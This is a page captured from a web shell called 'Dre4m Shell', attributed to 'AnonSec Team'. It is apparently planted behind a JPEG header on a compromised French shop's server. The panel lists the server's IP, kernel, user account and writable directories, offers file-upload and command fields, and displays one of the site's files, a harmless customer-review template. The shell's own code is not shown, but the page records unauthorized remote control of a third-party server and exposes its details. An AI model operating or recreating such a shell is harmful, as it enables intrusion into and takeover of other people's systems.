ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.110
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/computer3/litsolide.com/templates/shop/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/computer3/litsolide.com/templates/shop/avis_clients.tpl
{include file="header.tpl"}
    <div class="container">
        <div class="row">
        <div class="{$type_anima}">
            {include file="centre.tpl"}
          </div>  
         
          <div class="{$type_anima}">
            {include file="left.tpl"}
          </div>         
          <div class="span8C"> 
                <!-- Titre de la page -->
                <div class="title_cat">
                    Avis du Net
                </div>

                <!-- Contenu Avis -->

                <div class="thumbnail">
                    <div class="caption">
              <br /> 
												 
							{if !empty($avis_text_2)}{$avis_text_2}{/if}            
              </div>  
              
<div style="text-align:center;padding:2%"> 
<br /><div style="font-size:16pt;color:#cc0000;margin-bottom:20px">Votre appr&eacute;ciation sur le site</div>
           
				<form class="form-horizontal" style="padding: 0px;border: 0px #ddd solid; background:transparent;width:100%" id="avis" name="avis" method="post" enctype="multipart/form-data" action="./avis_enregistre2.php">
				<input type="hidden" name="from" value="contact">
	
				<input type="hidden" name="type_paiement" value="A">        
				<input type="hidden" name="codeSuivi" value="{$codeSuivi}">        
				<input type="hidden" name="id_cde" value="{$id_cde}">         
                      
                     <input type="radio" name="etoile" value="5" /><img src="templates/shop/img/etoile_5.png" alt="" />     
                     <br /><input type="radio" name="etoile" value="4" /><img src="templates/shop/img/etoile_4.png" alt="" />      
                     <br /><input type="radio" name="etoile" value="3" /><img src="templates/shop/img/etoile_3.png" alt="" />                      
                     <br /><input type="radio" name="etoile" value="2" /><img src="templates/shop/img/etoile_2.png" alt="" />                     
                     <br /><input type="radio" name="etoile" required value="1" /><img src="templates/shop/img/etoile_1.png" alt="" />                                        
             <br />                                                        
             <br /> 
   
              <div class="" style="width: 100%">
								<div class="" style="width: 100%">
									<input type="text" name="avis_titre" placeholder="&nbsp;Titre de votre commentaire *" required value="" class="form-control" style="width:100%"  />
								</div>
							</div>   
             <br />   
   							<div class="" style="width: 100%">
								<div class="" style="width: 100%">
									<div style="text-align:center">
										<textarea class="form-control" style="width:100%;" placeholder="Votre commentaire *" required name="avis_message" id="avis_message" rows="5"></textarea>
									</div>
								</div>
							</div>
              
              
              
              
              
                           

<!-- les produits -->
<br /><div style="font-size:16pt;color:#cc0000">Les articles de votre commande du : {$order_date_insere}</div>

							<br><br>
							<table border="1" cellpadding="4" cellspacing="0" bordercolor="#C0C0C0" width="100%" bgcolor="WHITE">
								<thead>
									<tr>
										<th width="30%"  class="txtblanc" style="text-align:center;border:0"><strong>Produit</strong></th>

										<th width="30%" class="txtblanc" style="text-align:center;border:0"><strong>Note</strong></th>
										<th width="40%"  class="txtblanc" style="text-align:center;border:0"><strong>Commentaire</strong></th>
									</tr>
								</thead>

								{foreach $products as $product}
									<tr>
										<td class="" style="border-right:0;">
											{$product.name}
                      {if $product.attributes != ""}<br>
	                                            <span style="padding-left: 10px;">
	                                                {$product.attributes}
	                                            </span>
	                                        {/if}	                                        
										</td>

										<td class="" align=center style="border-left:0;border-right:0;">
                    
<!-- {$product.attributes|replace:' ':'_'} -->

                     <input type="radio" name="etoile_{$product.id_product}{if $product.attributes != ''}_{$product.attributes}{/if}" value="5" /><img style="height:25px" src="templates/shop/img/etoile_5.png" alt="" />     
                     <br /><input type="radio" name="etoile_{$product.id_product}{if $product.attributes != ''}_{$product.attributes}{/if}" value="4" /><img style="height:25px" src="templates/shop/img/etoile_4.png" alt="" />      
                     <br /><input type="radio" name="etoile_{$product.id_product}{if $product.attributes != ''}_{$product.attributes}{/if}" value="3" /><img style="height:25px" src="templates/shop/img/etoile_3.png" alt="" />                      
                     <br /><input type="radio" name="etoile_{$product.id_product}{if $product.attributes != ''}_{$product.attributes}{/if}" value="2" /><img style="height:25px" src="templates/shop/img/etoile_2.png" alt="" />                     
                     <br /><input type="radio" name="etoile_{$product.id_product}{if $product.attributes != ''}_{$product.attributes}{/if}" required value="1" /><img style="height:25px" src="templates/shop/img/etoile_1.png" alt="" />                                        
                    
                    </td>
                    
 										<td class="" align=center style="border-left:0;">
									<div style="text-align:center">
										<textarea class="form-control" style="width:100%;" placeholder="Commentaire *" required name="avis_{$product.id_product}{if $product.attributes != ''}_{$product.attributes}{/if}" id="avis_{$product.id_product}" rows="6"></textarea>
									</div>                    
                    </td>
                    
                  	</tr>
								{/foreach}

 </table>
    <br/>
    <br/>
				<button type="submit" style="margin-top:0" name="envoi_message">Valider mon avis</button>
				<button><a style="color:#fff;margin-top:30px" href="./index.php">Ignorer mon avis</a></button>
  </form>
               </div> 
              </div>






            </div>
            {include file="right.tpl"}
        </div>
    </div>

{include file="footer.tpl"}


                

Anon7 - 2022
AnonSec Team